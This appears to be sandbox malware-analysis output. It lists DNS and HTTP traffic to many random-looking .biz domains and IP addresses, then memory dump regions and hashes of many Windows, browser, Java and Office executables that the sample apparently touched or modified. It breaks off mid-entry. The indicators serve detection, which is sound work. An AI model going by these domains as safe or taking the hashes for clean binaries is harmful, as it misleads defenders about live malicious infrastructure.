US 172.234.222.143:80 fwiwk.biz tcp
US 8.8.8.8:53 ww99.fwiwk.biz udp
US 72.52.179.174:80 ww99.fwiwk.biz tcp
US 8.8.8.8:53 ww7.fwiwk.biz udp
US 199.59.243.227:80 ww7.fwiwk.biz tcp
US 8.8.8.8:53 tbjrpv.biz udp
IE 34.246.200.160:80 tbjrpv.biz tcp
US 8.8.8.8:53 143.222.234.172.in-addr.arpa udp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 deoci.biz udp
US 34.227.7.138:80 deoci.biz tcp
US 8.8.8.8:53 gytujflc.biz udp
US 208.100.26.245:80 gytujflc.biz tcp
US 8.8.8.8:53 160.200.246.34.in-addr.arpa udp
US 8.8.8.8:53 138.7.227.34.in-addr.arpa udp
US 8.8.8.8:53 qaynky.biz udp
SG 13.251.16.150:80 qaynky.biz tcp
US 8.8.8.8:53 245.26.100.208.in-addr.arpa udp
US 8.8.8.8:53 pywolwnvd.biz udp
US 54.244.188.177:80 pywolwnvd.biz tcp
US 8.8.8.8:53 ssbzmoy.biz udp
SG 18.141.10.107:80 ssbzmoy.biz tcp
US 8.8.8.8:53 cvgrf.biz udp
US 54.244.188.177:80 cvgrf.biz tcp
US 8.8.8.8:53 npukfztj.biz udp
US 44.221.84.105:80 npukfztj.biz tcp
US 8.8.8.8:53 przvgke.biz udp
US 172.234.222.143:80 przvgke.biz tcp
US 8.8.8.8:53 ww99.przvgke.biz udp
US 72.52.179.174:80 ww99.przvgke.biz tcp
US 8.8.8.8:53 ww12.przvgke.biz udp
US 76.223.26.96:80 ww12.przvgke.biz tcp
US 8.8.8.8:53 ww7.przvgke.biz udp
US 199.59.243.227:80 ww7.przvgke.biz tcp
US 8.8.8.8:53 zlenh.biz udp
US 8.8.8.8:53 knjghuig.biz udp
SG 18.141.10.107:80 knjghuig.biz tcp
US 8.8.8.8:53 uhxqin.biz udp
US 8.8.8.8:53 anpmnmxo.biz udp
US 8.8.8.8:53 lpuegx.biz udp
RU 82.112.184.197:80 lpuegx.biz tcp
RU 82.112.184.197:80 lpuegx.biz tcp
US 8.8.8.8:53 vjaxhpbji.biz udp
RU 82.112.184.197:80 vjaxhpbji.biz tcp

Files

memory/1980-0-0x0000000000400000-0x00000000006B5000-memory.dmp

memory/1980-1-0x00000000006C0000-0x0000000000720000-memory.dmp

memory/1980-7-0x00000000006C0000-0x0000000000720000-memory.dmp

memory/1980-8-0x00000000006C0000-0x0000000000720000-memory.dmp

C:\Windows\System32\alg.exe

MD5 4f7904bda711c36768d34b3ad59964f2
SHA1 116e69639019b9708871dccc8b654dfa1eb5bf96
SHA256 53333002949335d69e6207fd038c744a99cd21749df7e770e36d5b0305e431a4
SHA512 1ec9425da41eb73b7d6dea63eeb49d982c43e0a99244e7e2e520c8d1bc3951d4a1cd4149d9ec0fb293d1f8d17c76decf8bf02b7ce195f000021be7b7b4e0017b

memory/4500-22-0x0000000000690000-0x00000000006F0000-memory.dmp

memory/4500-21-0x0000000140000000-0x0000000140148000-memory.dmp

memory/4500-13-0x0000000000690000-0x00000000006F0000-memory.dmp

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

MD5 012e9792a27d3a9d97e656d86d63b652
SHA1 ff4eb3b8415b56e9d236e1af5ddf6061d817d18a
SHA256 d4b676a792f0716dc51fdad510244b4ea89c0c150297a1c04e396cd7a7571254
SHA512 9e88b1378cd45c5d9c1918a9647cd15539a51021cf18321d0ca19cc61fb78ee1025c609b340d3575f80f2d0e60e2d037d12c3e54816f6504d4696ff0214f7a2a

memory/4252-27-0x0000000140000000-0x0000000140147000-memory.dmp

memory/4252-28-0x0000000000700000-0x0000000000760000-memory.dmp

memory/4252-34-0x0000000000700000-0x0000000000760000-memory.dmp

C:\Windows\System32\FXSSVC.exe

MD5 7048f5d7c5ac64a2cb6bf3461bddc6f8
SHA1 ff863ed3372e0302a6a76f85b3731ce018196783
SHA256 5323d37aab4071503401d45ee06c5823b75eb9ec473b1ac478c585cd0189fb32
SHA512 c79e31320c0fd3aeaae41362ba2d2fa3c1f9352de1dabb7d31fb6d33585a311bbe6117d0669ea9c25ae1533d8fb08af82dceadd9b78e0d93cc932d0094bad7ad

memory/3376-38-0x0000000140000000-0x0000000140135000-memory.dmp

memory/3376-39-0x0000000000830000-0x0000000000890000-memory.dmp

memory/3376-45-0x0000000000830000-0x0000000000890000-memory.dmp

C:\Windows\System32\GameInputSvc.exe

MD5 22bc1132252173d21882c7e44f90d134
SHA1 69b5f46066f3ea006bdad6042699051734833808
SHA256 5c5e08b96edac27400d8f12cf681f567aa51e0e4d874bed17c2bd023f5ff35aa
SHA512 63e8f910f7836cfe2879cdee17ca95e6c83e7cc0be1c2dff74c8fd63e8217f2dacdd0f0f3da29de2ab33451d09f72a66e74e2e8811adb03653927734d00e4fc7

memory/4588-50-0x0000000140000000-0x000000014013D000-memory.dmp

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

MD5 a6531e63df6733eb8ba1997159418051
SHA1 8e70218ed79af49f7d85d7c4cdc1efcf67febd92
SHA256 613dc7ca31a739a6985e0f7e122b18bd50a9a7c09f094b857cda24ab1ec1f7c8
SHA512 88b3c265169827dbfd90cf77567bb46eff049d47bbdee17a682be3b0708c1b038f960cf29ab6799b1b0b9c0aab417f53109d79498579982b2156d8efc14d43bb

memory/3376-67-0x0000000000830000-0x0000000000890000-memory.dmp

memory/3376-66-0x0000000140000000-0x0000000140135000-memory.dmp

memory/1816-68-0x0000000140000000-0x0000000140234000-memory.dmp

memory/1768-65-0x0000000140000000-0x000000014013D000-memory.dmp

memory/1980-62-0x0000000000400000-0x00000000006B5000-memory.dmp

memory/1816-60-0x0000000000C40000-0x0000000000CA0000-memory.dmp

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

MD5 c457b4c9044b1dc4d96faf6bfb1d6b6d
SHA1 02e8067f05a53096fad9e99f81b3b2babdc03965
SHA256 ef4c75655def6a20809955419d320eb93177544f6aec95fb4561c491ca27c72e
SHA512 b3ed9c17eb192a3ab07ff63a5068082f00b989b3b1d834c298fd64a2ab909c3f8edf83d61b69e8e51cc47a21b8dbac3408bc04d2a2e93d542c19035692fdb139

memory/1816-54-0x0000000000C40000-0x0000000000CA0000-memory.dmp

memory/3712-79-0x0000000140000000-0x000000014022B000-memory.dmp

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

MD5 184aef862527cf3856f015dc20b9ce85
SHA1 9a62a0d6773810212d09bae6d75947b3981a9da9
SHA256 e640502c9bd1ccb5a00c9c998910bfe04646f60f0dea9aa60ce67e20e93640b7
SHA512 330700f1ca68fd91550b88b662a37fad330e4d91d48961e32a19b271bd476ef377757548750e86782f53a838700291a13fc03e9778ac0f7c1f7cf70ad266df06

memory/4752-95-0x0000000140000000-0x000000014016E000-memory.dmp

C:\Windows\System32\msdtc.exe

MD5 19f218f1c1248846d61f3b9131a09e7f
SHA1 62afa56248fb316adcd8f6658cf330ba89223493
SHA256 0f3ccf33e88f6440b137eac3150fc7df69244202f5c5071fd6e2cb18ab5afdda
SHA512 09a403da0efffac95ab093099c3440146622bd4c5123e4838d05ed9a2006fb6925edec6aed70305af5f3b730a335751fb0c7c8105f4963f62ff96a2d25f2ffe6

memory/4612-97-0x0000000000D70000-0x0000000000DD0000-memory.dmp

memory/4752-93-0x0000000000C00000-0x0000000000C60000-memory.dmp

memory/4500-90-0x0000000140000000-0x0000000140148000-memory.dmp

C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

MD5 9e21e7973cd4ddfb5d72c8bba1367bf1
SHA1 2d1db3cbd009473346b49b24a762a0b0caa60077
SHA256 59a719994ec713d62d91c5856eaa42927c44bc0369087aa2c87a6b0c4210f465
SHA512 e52d638d8731fe64d99a764ccf0ba1343f893619c2af4d183eb707ee8596ceb034e1762db860c44181cc2e5ef14e828784e7ea209ff30c0fff62c895a2bdee71

C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

MD5 ddfb83be3c82beb0f58e63038cc10e98
SHA1 22666426297ce625829b121e9a59e6c7a55715cb
SHA256 daa51069d05003398096e9742a79f94cfea66a99ca963e85efbde7711710337f
SHA512 f33eebc34aec978679ed70dccac96498c13083762257d2a5c2a8cf2775b09c717d6f9931c7b373e0d28fd957c78267be760e1fcb25ef3c53ea6d9a8676df8951

C:\Windows\SysWOW64\perfhost.exe

MD5 410f8b9d946192c41bf1b332d7443354
SHA1 32a79d3045e0f8fd7adba50fcfb223e0b1e9603f
SHA256 96b46e74d94806195433d3f05bf8bb8892ef9dc7653bf875bc42bf9384dd195a
SHA512 f12e9f33cefb6177bdeb3a370d25c16bf4fff5e0584135f8ffe6f07d6d12eb270bcb6476c8b3100e8be2d439897887d46ec606ee107fd293ff6f59bc6b34b52d

C:\Windows\System32\Locator.exe

MD5 ccab74b1960f84a489b318bcda93c31e
SHA1 489995d669969d9c65ee4837434e25e7932bb2f1
SHA256 201cb6b70574c1f62ddd47815ed6ba66c82c76622193bacfd26d0d116e087b51
SHA512 91b2bec94758d42b1575c2935ccdabde5c0071f82dbd30d2f492442c3cb6061c5dc149a5e8a5b35624d5db9202266e6003f3d1e08351007af9e50f90eb2bc6f6

C:\Windows\System32\SensorDataService.exe

MD5 6c4ee5b0994f60228cf2e428a800841b
SHA1 84ba9afec5b1c5d4ff81bb0dc84fa6391a7f3954
SHA256 d90c00d3682e5e70ca49f6407be694bb9c22a62a39d84a2febde828ca2ef8915
SHA512 1f72973b178cea0de35ef96222fd6e463f5ef11d71d297c169f154a6cf9f602ece03b89081183e8c105862646621d6b4b4e7b6bad9c119e90849adf42a4755b3

memory/4752-88-0x0000000000C00000-0x0000000000C60000-memory.dmp

C:\Windows\System32\snmptrap.exe

MD5 9c2597ef204f6fd252fb0ccbbf5dbf6b
SHA1 a97e97ed659404a7c60a3887f4189efbdcc40fc4
SHA256 33d4644567ef4df6236573f39d9409ed7cd4eb5c6c854e5c3e583c4f19391d96
SHA512 b6aed92296c832bf436b5ca913f425ed16bf31206a9910d65b8aeb513ea219c5864e2cb607fde1d049607093daffe694fcd7ec95c22392c089bf81be98d04400

memory/4752-82-0x0000000000C00000-0x0000000000C60000-memory.dmp

memory/2268-164-0x0000000140000000-0x0000000140149000-memory.dmp

memory/5060-166-0x0000000140000000-0x0000000140133000-memory.dmp

memory/4612-169-0x0000000140000000-0x000000014015F000-memory.dmp

memory/332-168-0x0000000140000000-0x0000000140134000-memory.dmp

memory/2332-167-0x0000000140000000-0x00000001401D7000-memory.dmp

memory/1428-165-0x0000000000400000-0x0000000000535000-memory.dmp

memory/3268-156-0x0000000140000000-0x000000014016E000-memory.dmp

memory/3712-77-0x00000000001A0000-0x0000000000200000-memory.dmp

memory/3712-71-0x00000000001A0000-0x0000000000200000-memory.dmp

C:\Windows\System32\Spectrum.exe

MD5 59c34d5143b6c9043e45e552a12c84fa
SHA1 760de71aea32eca5e961823eba4bd99f9ea97147
SHA256 033f23c2e1ee118aa4f6fc68702eb604b5ea7f6dad926537cf3fcdc963bd23d3
SHA512 0be431278c952c1aa49f44ea42d82656025644901d07ca3f1e6e706f56b82d92785013a3cad40ad204f054dce879300bac32fef29e509ba2454ce9043a0d2233

memory/3872-173-0x0000000140000000-0x0000000140169000-memory.dmp

memory/4252-172-0x0000000140000000-0x0000000140147000-memory.dmp

C:\Windows\System32\OpenSSH\ssh-agent.exe

MD5 d205b9c6b5917e9d6b717ec5959ee681
SHA1 efd7be1338695cdaa7a8c2e1e009f70a6d386db3
SHA256 1a6c8d2d0ebdea7cc9efe97829644968a1df84f031ae2304d4645bf82a540eea
SHA512 c291ff93fcd25bdc75d575a0a3af1bc6b174c4615c10286775f68539b310ce1bb89bb6a8f4c0c88542cc670f7e6d0764d2f826a92defa0cfe0bdb7833b957485

memory/648-194-0x0000000140000000-0x00000001401A1000-memory.dmp

C:\Windows\System32\TieringEngineService.exe

MD5 674909d3e77d68aa73e6514d3f487860
SHA1 a8b66bd0b56df0e15de59f201fa6c30c27f23687
SHA256 cf04fc0abf8dc7a63cbf2b4bea48db9dd0122ed062066c1ba1c8027133da00a4
SHA512 9c74cf6d6244c2ca7680a90c9f27155339fac1398c9bbc390bd4cbbe3bcfe27ba81c51aa1bcc81dbc8872884ad1b0d35ced8a6d4a2e9f0f32830c0ef49e6f555

memory/1688-201-0x0000000140000000-0x0000000140180000-memory.dmp

C:\Windows\System32\AgentService.exe

MD5 8fd09bb358925d1c625dc60256c58783
SHA1 0c5b6eba20bb88fb902e15a5fe0950c2d6a2bdad
SHA256 cc077a553dc0090d44aad5378b530cb854f20edc5be9e28aa5077fd66d755d66
SHA512 c2bbf90dfe17c3555310ce49ed285c3e1857863abc7c36a99e7c82654770421d08237412378929be92ebb60034bbcc82d9d421e0622df9c43385ede8c15f40c3

memory/4596-208-0x0000000140000000-0x00000001401BD000-memory.dmp

memory/4596-219-0x0000000140000000-0x00000001401BD000-memory.dmp

memory/4588-222-0x0000000140000000-0x000000014013D000-memory.dmp

memory/4640-223-0x0000000140000000-0x0000000140144000-memory.dmp

C:\Windows\System32\vds.exe

MD5 71903afee6cf81493e8fd7ba9b7c334a
SHA1 a74d779603fde201b28622b915183b5e120615e5
SHA256 36c7bcc17d947bb2f29493e700ba568a3601b1a1ace11705453a5c41e85cd6fb
SHA512 3237d206a8f274d9953ee289d2cd7c578a049fcd014bf4f728054c46a63f6184ee1323a294a5ae5a7bc61077b2142007fd66fb03eaf9e80285e78d9409658480

C:\Windows\System32\VSSVC.exe

MD5 183fd88561558757682f6fddd0ca06c6
SHA1 dc72003cdb7ff0e6d9e1d1200ccfa2a0662280f4
SHA256 bec0f3e66a94969f7004106f1a21dcac5ebfc8ffbb2c49c9b1cd954ddc8538c9
SHA512 a03e82186964e0ecbea00bd9cdcec851ad90d027d906a3f39b479bc7e9d7659ee067fa11d7c6d481b08225f9dbafd4fb0bbc07ac2c79446998f1d4f5594fc5a5

memory/1292-243-0x0000000140000000-0x0000000140200000-memory.dmp

memory/1816-245-0x0000000140000000-0x0000000140234000-memory.dmp

memory/3712-246-0x0000000140000000-0x000000014022B000-memory.dmp

C:\Windows\System32\wbengine.exe

MD5 da4feb93fdf9f5b83e7c7cc79935f0c2
SHA1 9c20b02a7ca5a6ce2e75762a961ea6265cda4bb9
SHA256 ef9b01f207822a60da377e2e85c5968cdc1fd27071b5822d2eb9472230d08d66
SHA512 30ee27dc20ae28f8180afb668f4619230e8f75bc80d5136db9d957d82471fdab7742f3b90446a1e0ec35ca865152132d794749513c27541e52bd242edd245ea5

memory/4532-255-0x0000000140000000-0x0000000140216000-memory.dmp

C:\Windows\System32\wbem\WmiApSrv.exe

MD5 5ad73bed49d034c4cef1833eff13d37e
SHA1 37345aa9a848f936d0a2fa85fc1aaffc7833804c
SHA256 3786a28c394d1560880c0d00373e26ff83966f69a9b347c43362ee2ffe081039
SHA512 1447dc965f90c9fcd5e0b495a02334b9ecdcd2816092075cb36e5bc81544308b02101429bebe3908572601d88d6348bee3f18b54e6c4338bc4d576058a42a85f

memory/564-259-0x0000000140000000-0x0000000140164000-memory.dmp

C:\Windows\System32\SearchIndexer.exe

MD5 e1266fae24bfcb3b93c0f09c47e466ee
SHA1 146286453113840b6e244182e28e9cdd4bc1aa01
SHA256 6b1d4b5892d692c2d04575485b18127847ab06ca8d40c3c5650530f9768e61a3
SHA512 81cd0b93fc6232cfdb4ba6806191c01691575a5371de9214f5a4411b56b2110fe7fa912fc054af5a2e5d52b119397c25be9db2242b16cbe88462e1a2b8caf95b

memory/2216-280-0x0000000140000000-0x0000000140179000-memory.dmp

memory/332-279-0x0000000140000000-0x0000000140134000-memory.dmp

memory/3872-433-0x0000000140000000-0x0000000140169000-memory.dmp

memory/648-450-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/1688-452-0x0000000140000000-0x0000000140180000-memory.dmp

memory/2332-458-0x0000000140000000-0x00000001401D7000-memory.dmp

memory/4640-459-0x0000000140000000-0x0000000140144000-memory.dmp

C:\Windows\system32\AppVClient.exe

MD5 c4afd16534c096f1eed0ef8738b76ddf
SHA1 98ec3ba859b5d99581748487799f15484c08d9ba
SHA256 814410a6f6d672ece3e28f58ea3ec1ee685ddae337d14c382e26eb0407fa8db7
SHA512 96705f9be5b4a5b3bed9da65359c7615f29ef4302cb1d40b40b2b33a0536e4db9fc087cb1470359fb1c3afe55bcec22a9607d738f249a05d7e6d20da88a48edb

C:\Windows\system32\SgrmBroker.exe

MD5 dd455a57e0f93183d9a543ea7bc06ce5
SHA1 4b389e043d531fdf93ae51bd30b422ea5bda3e6f
SHA256 52c46c153dc03f74967aeada3da25c2c595051e6ae66fb8bcdbd4386f8746017
SHA512 f34aaa5c5389fad2b4ee092784409b0d6e3736a27b339d67f9df0278f6e4ff3a0976a5002db72241c6c6664583370d1a68aa91c06189141f8ce3bfdde5e443db

C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

MD5 64fa996cda60010ce71b038eb4e6104f
SHA1 43cb437e1aaa00c7b3b1b978d7396da275030c2b
SHA256 29a4fe1b24333099596d2476d15011189e1bc8a018b5268b500daf0b9f1f87e1
SHA512 bfdcf78c583cd57d81affda8de3ed992b33f917db6644adbaf22e9fb35929fb3c42210904a08bad0c0bb1f9db07e15cf9071ad123f36682d33d8368c44d548d4

C:\Windows\system32\msiexec.exe

MD5 2df5cf6215e19fca6e6510e265aa0110
SHA1 3a47bae38ccf10689a27ae904f22a4aaacb22b51
SHA256 55cb13867ec4b8ef65324e75b0eaa70d6f87661fc66af37b58ead212609bb6f8
SHA512 cf75001f88fa7e6f53d11cabfa56e656db13abf5b6b7ff360d37ddb414aa0af8cb9ade406ebc863081bd2cee0b81c91bfd560ae0632d0607eb3e19c90323a0a5

C:\Program Files\Windows Defender\NisSrv.exe

MD5 3d36474e1d9d08068d3742f049931e48
SHA1 1cf04ea77fa7f538e28a46bd657415f5245d172e
SHA256 dd1b252c26f89c115184994e560d4ac0bb259c2c626576b76686cbda11f3123f
SHA512 2730a03a4bc61f8cafe06ddc1517b203474d704350d5af75c78b72726fbd7262c264ca5c3a34fa85b8880e1e3d806be409acc2e49841a218f647416c4f5a56a0

C:\Program Files\7-Zip\7z.exe

MD5 62e9a56937160d9fc80f2226074de4d4
SHA1 784a9a12d63adbfef954a51da7ca9452f3325690
SHA256 5486c648fbdf9ce6613f7827cfd6c5e5e89ea435460581653a7272ea0e01f06f
SHA512 04deb992229d3b146ddacaf06c4b5319c570bec0cd16e3976f1d24d27ba4a3370b86b7816d8960180772788f764370ae09bd7d1f73222ed8d23c4bad7e749ab8

C:\Program Files\Windows Media Player\wmpnetwk.exe

MD5 5736c4f14e30e41da68033ab60f52355
SHA1 6554b9a1ad40d6e2b6a70a2776ffec0fb6f5f164
SHA256 ab079a0e26b6d7e9c56d6742bdb49e71b90d2c9c88077d4834889d1ed65fdad8
SHA512 ff285018dc2d6f6489222bb006a8a4f7054a99876c6c0756ef8dfddcf838194b4c0408eddd2dec80adad3d7e4956c09e179a7e5393ef88ec69b4adf614a56cee

C:\Program Files\7-Zip\7zG.exe

MD5 de76ca1fcc954ab723ba5d1ee86bba90
SHA1 d353252c0c48af2a95d12464f7133c64db59a91e
SHA256 b96f0d8d3f14ae5ff4b432d17926f8f66b4f2e18e79808945fa538833b8c5a91
SHA512 8dc101a4ed96884611910e4b26d32ff5dd69f99431dcd345cab3f08198eb3047653b9b50a7f69b5487936f11140965e486835a88466f9da4edfe463726f5c093

C:\Program Files\7-Zip\7zFM.exe

MD5 1bf486a28289c84a8bdbecceb8b51a4d
SHA1 c00232c1d853d12fb93e8fc5325978c9aa6e5e57
SHA256 de48513a41ae4cd57a48b96979e7fa1bd4162e05594770f11a29cbdef21ceec1
SHA512 de0196eaa7c04a5423ec2879484585993854546a7cd150b7d895db6fa38bca3b61b715c7b8f29f5bb0bc636ceeda2959e3e60b70ad2f3503d490c406c17660e8

memory/1292-497-0x0000000140000000-0x0000000140200000-memory.dmp

C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe

MD5 81adaf67907282e6b3122fc5faae25d3
SHA1 98ed2e119ce537963e524854133cd2db72491d4a
SHA256 6244f74149b0199009c7869e8a1520d89e9ef510493f83d6864a50fe91bc1b44
SHA512 b8dad8e0df4ee2399418dac0be4ed62fdd1b167c33464bba90c677a5c6ac69058af2643f360237ed9e5324cce043b1f2cec00cbc36111645b61cb7b90772453c

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

MD5 2e478ec2f9bf3b62751e41d1074daa64
SHA1 490eb6760f5b931488998062d157540fd2b6a207
SHA256 c63d2fda5aaa9419a53c9fbcb8006d2b004dae6bac0deff82c4fff5a9a3dc884
SHA512 1c5dc3b816a2b262fd1754569501293fb8dc51d24eb60ed89e5d33fc67a070499073fca764677f9ca48acf939a2e8c8145171e4f037a2b1bbca9d73558a90261

C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe

MD5 18700ea8316c1d7d4c2f376c9a48dcc2
SHA1 8df4b5c222366c21176961a2112560211c094edd
SHA256 c3a60af3178b1dc64914bbf1f739bc5ad17df8bf104e48ef3e571299cc94cdcb
SHA512 d77d6f1ac980bafc0a8289ee73261fde71e1f2b3c527f7d07eb2590207f784748d6618115829f785b30159d2ee6ca4f80551262ccba49ea91f927019417ab3ef

C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe

MD5 4be6f8ba3f9fefa5acb0bd55ec34586f
SHA1 b9cc05bd0bd9c5a29249a42eb578fa04f4e4396a
SHA256 6118e8757e53d60c3854de38d195b5b0475afeb63813a2e012dc4efeaa0b19c9
SHA512 2d6930be68991bfab1874afbcdead65f8e26f8c9b6e3c12028bb1f995e00ee82b23051cb350e6c1c0614659f9f70a962b31b94579aa5354c83a2aefb3ac2d8f4

C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe

MD5 fe417ff2934357d59191a992f97f05fa
SHA1 a8ebbe295dc9af1266469032b2c4be0ccfeb45f2
SHA256 a561ea23afb87905e1c0f41a391812c0ac8d8a80464a0c449f59df05b581fa5e
SHA512 42012b1a72b9305c8a6bd57efe14c7901b0d9585c02318955aa9dedd1c8d3fc7b02afd19dfa0e06638d23b44425ff6fd7312b0730f3c0c917e5913d5a893ab72

C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe

MD5 428279033e18fa4b0552d2bc3d67c9f9
SHA1 361628d3e8411b3e9c31413312d5b34f4c5d345f
SHA256 c41c00527673f5093158ba0b9a282200fd91cb3b6d050f57fe6858c9346499e6
SHA512 9babeaf5576bb7faa7335be7ad0180894ad218aaff608c048ec7659476e56bf69aa3af149de478528f3a22daf7388cdc4e04b6e85b78130b7e6f0b8de1c41cea

C:\Program Files\dotnet\dotnet.exe

MD5 da6c093d3de37934967b9c7124d4ad6c
SHA1 b10954e0b450c9b5980eacc7a187b74b5f1d893c
SHA256 04c730ae57962149c4437ac53b2f21466a6abadf0caa3fbb16f6d66f84392ede
SHA512 a6f31da69317e507d4500894ae057e3245b09508e6f5ceed64c925d3676a86d4cb14c10bc58953b2e1f09ef5ee6b08dadf71c35058bf55f286192b83963a1ff6

C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE

MD5 11b0bddf069f7d93585fb3cb004e7f1c
SHA1 55e1730096b6ed5ffc663d598f4bec14bbd22cc8
SHA256 e0d8c0be3369eb97b851a647cf6a5740bbb37aab6520f7726f20f840aa31712f
SHA512 e9d89d00c973eb251befffcdd48884e2d5423cd251b0b4fb50f23be0e5642463a2b4770939c17b7f1e2bbe42326a1c19939a21161f1ab7a73b2bc99582942af2

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

MD5 82c7cd25feded5c8edd45a2d4ee87ecf
SHA1 05a366181569265a6082c53e839cccb94e356e78
SHA256 7af35872ba1b552e89e48bc7f56c3df965bf42b2527e11d851b3c275a2137642
SHA512 1a5e8c1fbeaf6562b3ec44d6daf5b77026efb6d0603af0a0e9c97668e05f035118b1c2f0d6aa1e90df5f83487b84048f03838b54be54368612a16b0c0114f112

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

MD5 00e66ef256f3065e543eaad37a810d7b
SHA1 136e58c5ef04800df58be2a9c9cc0425b99cea81
SHA256 6c68ee30e71dace7b706e7dcd481e357804c63a715d53217889c81da42d1dd94
SHA512 69003900611dc8843785f734a8707079acb041d2f3e6a0057316e9cb6588a5c0a0f6b4856cba33a340fae89da56596fd034916a5aee408794eecd0028944e15b

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

MD5 27ec0d2a02e4a431d087b4a4f0548027
SHA1 65ada07b6cf86d76dafaca6b6feb8780c40fa030
SHA256 221b4089c8a9dc35de33cc0cb5a1a6040f7f5798967329325392f6a933797a6d
SHA512 d4512f46513c26b94b1651572e26beb5aa9bf7881e7d548d93e81bac5a1c68f724eded39b44f1bfeff0b1ed1e707508bd3dd9e42c33a00d5a86a2ed1cf84a112

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

MD5 4cf56dbe25c0dea1ba5772eda13980c7
SHA1 c7a8bf27f808fe03b933385b3eb56c3996f7768c
SHA256 3f2994a243ed0bec10e188354f1321ccf14d8a4f2a98c3b454362cc2d1e8a5de
SHA512 761759ee3c58539d69a0f6b72a3fbefb7e9d6aa06b156177c3cc85dccc1ba4b4d75b04ab10ae6fd0d1c245a40639b4c75a691fad603c3b0ded7199e4f5160f3d

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

MD5 24e1bf445dba35eacbdbd6257affff85
SHA1 0b932be107ccbbba573731ba31aca0531f574230
SHA256 823bed65fc09c1c722360baf898532673a9dc6c48c7d2f41294c7bc90c364be3
SHA512 f4af9ff66d7b75dfe6df9517c04298a87f51fb823fe59db59b39c8e0b84fb555c636b1f6b1b0355f447fab1782a2de4fa375d081f59512b9ed07af6959fa4e73

C:\Program Files\7-Zip\Uninstall.exe

MD5 0ebaad2fc30540d65a7a044d92c70ef4
SHA1 18ee63bee1eb9b3c046c4e0c73907f4fdce5a253
SHA256 a351ebddb69c9848a514077fbc99d04ab9402425a5f9cd4b262cea4ea4983200
SHA512 2e3aef11f5731918120d98830989965c35ec2ea75b79b1d23b2f8e2ae6e216ca39f3ed72e5d0f9f66a4a3586ddc647d21128f0b7178bf03ba6d61fcddc3ec5df

C:\Program Files\Java\jdk-1.8\bin\javac.exe

MD5 7a71d0d5aa8a2685225f92805a63a48f
SHA1 6a0b697d9e58ce083b5e4e59603e66d1efa316c9
SHA256 30af3175b2c200fca437b2efcddd4e39f3c57df173922868916af37b97bbe3a8
SHA512 f95c38d8d379ef0435eed4c4cb48dc3854ecb0b347fa1d2b5d954580e272dcc2bcc35a7693cf827e1bc95973c5d977ce56615c925aed99d51a643078bf1ffe71

memory/4532-518-0x0000000140000000-0x0000000140216000-memory.dmp

C:\Program Files\Java\jdk-1.8\bin\javadoc.exe

MD5 4a3eec02d583715f0a7ba9ab5e8b9c2c
SHA1 52b4cf61dff82b614d05352683e0ffe48c4d95d5
SHA256 4e58529d1fe8f67d2e9643e99caec0c79ae9667d17a5ea7e57c6f47d3e6431ff
SHA512 f00bb638dce0ac8d0f98d6a5414efca099f341a61b2d6da6c349de27fe0f6a0805806062eda393862005bf4b130007a6bdbece5dba33011cf93b86b6467982ac

C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe

MD5 f8bfc35216c485c22f940ee49ab31d4b
SHA1 f90d172ea02c4ab08c76b1340a0340f98198a34c
SHA256 bb7b3ca16146a62a2d48f51e9442d2f2f0024fd5b9418d60e33b9d6440cf10c1
SHA512 75108dd834b47b5e5fe91a1fb8662b02a4a1a436450cdccdc22e8981263bd7f7ebb0aa5608a5302298787eb8d9c47f42ee2c25759b81fe8f69bd0d01d461b9b0

C:\Program Files\Java\jdk-1.8\bin\javah.exe

MD5 811cd7c3309a97ca105718f7c32649c3
SHA1 1270503209cad8b73783789bee73db74f6fcb68c
SHA256 1bed9a23062a72a911352eb23d6590c3304c8d273b2699fd9097bc77c0ce85f3
SHA512 661f91d132d2e48d7977aa8ba99d7a38dffd111b3a15f4488871fa2b10fc4c85993aab437e5a2b62a5751db96dc75d7d9b8a053adec5214e79090105458e4a5e

C:\Program Files\Java\jdk-1.8\bin\java.exe

MD5 63b600b6f3991c15cf947bd51225455a
SHA1 a50ff9ae6f46b3c1078ae3151448d17e3c462e44
SHA256 7a71be58046d4cf005d4154a4e64fb02f667c42f03bd892edf24e470bbe6914d
SHA512 ebad2a44600e22e04e4b6e4db9394a584594497beb05aec59e78d5e11c765c679b96679ad5925870c69debeb793e31fe92269f0edd3a4d4377ecc2af89197d32

C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe

MD5 65de8044a9237b2b467a421cf7452951
SHA1 1d400219868cb15ea2ebd0fae6b285c0b1439537
SHA256 beacaeeee72f44a7b2cc933e6d645d380bfbe95b0d3fd10dc4d40d56c6067eaf
SHA512 38ed96e42bdd54504d1de1611fa59717f875ddcbbc6fce8116f9238282b4620cfb3ac708e8d77ca56baa042cc9a8376c9b1c699a7b6245f4e8532d4048a9397d

C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe

MD5 213f102b007539f49ed0b9277dea7fa0
SHA1 40a3afa02055b40967522106680057da45dd328f
SHA256 eab1ff4b2e0594ffed3138ecde49c54f730b371e5f2451c425fdc01f894606ce
